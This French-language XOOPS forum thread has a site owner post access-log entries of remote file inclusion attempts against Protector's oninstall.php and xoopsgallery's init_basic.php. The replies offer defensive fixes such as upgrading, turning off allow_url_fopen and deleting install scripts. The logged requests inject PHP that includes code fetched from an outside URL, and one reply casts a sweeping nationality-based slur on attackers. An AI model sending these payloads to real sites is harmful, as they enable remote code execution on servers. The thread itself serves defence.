Fork me on GitHub






Failles de sécurité ?
Régulier
Inscrit: 22/08/2006 11:44
Messages: 186
Bonjour,

je trouve beaucoup de tentative d'intrusion dans xoops depuis 2 hours :

/modules/profile/register.php//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.sitepiratee.com/extras/idxx.txt?? HTTP/1.1

et 

//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.sitepiratee.com/extras/idxx.txt?? HTTP/1.1

et

/register.php//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.sitepiratee.com/extras/idxx.txt?? HTTP/1.1

et 

/modules//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sitepiratee.com/extras/idxx.txt?? HTTP/1.1

et

/modules/profile//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sitepiratee.com/extras/idxx.txt?? HTTP/1.1


ces requetes ne menent à rien vu le paramétrage du serveur d'hebergement.

Est ce que cela releve des failles connues de ces modules ? sont elles corrigées ?

j'utilise le dernier package xoops 2.4.2
Merci

Éditée par Ghia: Ne publier pas des liens au sites piratée ou SPAM

Posté le : 13/01/2010 15:33
Partager Twitter Partagez cette article sur GG+
Re: Failles de sécurité ?
Xoops accro
Inscrit: 20/02/2008 20:27
De Belgium
Messages: 2708
XOOPS 2.4.2 n'est pas le dernier version et contient aussi une faille (voir notes de release 2.4.3).

La plupart des sites a mis ses paramétrés comme allow_furl_open sur off, pour éviter des sondages comme ça.

xoopsgallery est une ancien module avec des failles. Je ne sais pas si c'est corrigée dans le dernier version. (Avis: à remplacer.)

Protector est aussi sensible, quand c'est mal installée (xoops_lib dans la racine, pas renommée, pas .htaccess).

Le script n'est pas encore à point et n'a pas faites des résultats, mais contrôlez votre logs Apache pour telles tentatives et banniez les nets du IP d'origine avec .htaccess (C'est sont quand-même toujours des Chinois, Américains ou des Russes, qui n'ont rien à foutre à votre site.)

Posté le : 13/01/2010 16:22

Salutations, Gerard.
PS: Excusez mon mauvais français.
De la bonne manière de poser les questions
Partager Twitter Partagez cette article sur GG+
Re: Failles de sécurité ?
Régulier
Inscrit: 22/08/2006 11:44
Messages: 186
je n'utilise pas xoopsgallery

le pirate envoie toujours les mêmes tentatives...

je vais passer en xoops 2.4.3

Posté le : 13/01/2010 20:59

:xfsuper:
Partager Twitter Partagez cette article sur GG+
Re: Failles de sécurité ?
Régulier
Inscrit: 22/08/2006 11:44
Messages: 186
protector a été installé dans les règles et bloque 10 tentatives de spam par jour

Posté le : 13/01/2010 21:03

:xfsuper:
Partager Twitter Partagez cette article sur GG+
Re: Failles de sécurité ?
Semi pro
Inscrit: 06/09/2005 11:47
De Barcelone - Espagne
Messages: 691
Salut,

J'avais aussi presque les mêmes attaques, mais j'ai enlevé les oninstall.php et onuninstall.php des deux dossiers protector et depuis, pas de prob

CIA ;)

Posté le : 08/02/2010 00:55

La plupart des questions sur Xoops ont des réponses dans le eBook: Bien débuter avec Xoops
Partager Twitter Partagez cette article sur GG+

 Haut   Précédent   Suivant



Vous pouvez voir les sujets.
Vous ne pouvez pas débuter de nouveaux sujets.
Vous ne pouvez pas répondre aux contributions.
Vous ne pouvez pas éditer vos contributions.
Vous ne pouvez pas effacez vos contributions.
Vous ne pouvez pas ajouter de nouveaux sondages.
Vous ne pouvez pas voter en sondage.
Vous ne pouvez pas attacher des fichiers à vos contributions.
Vous ne pouvez pas poster sans approbation.

Propulsé avec XOOPS | Graphisme adapté par Tatane, Grosdunord, Montuy337513

49 Personne(s) en ligne (36 Personne(s) connectée(s) sur Forum) | Utilisateur(s): 0 | Invité(s): 49 | Plus ...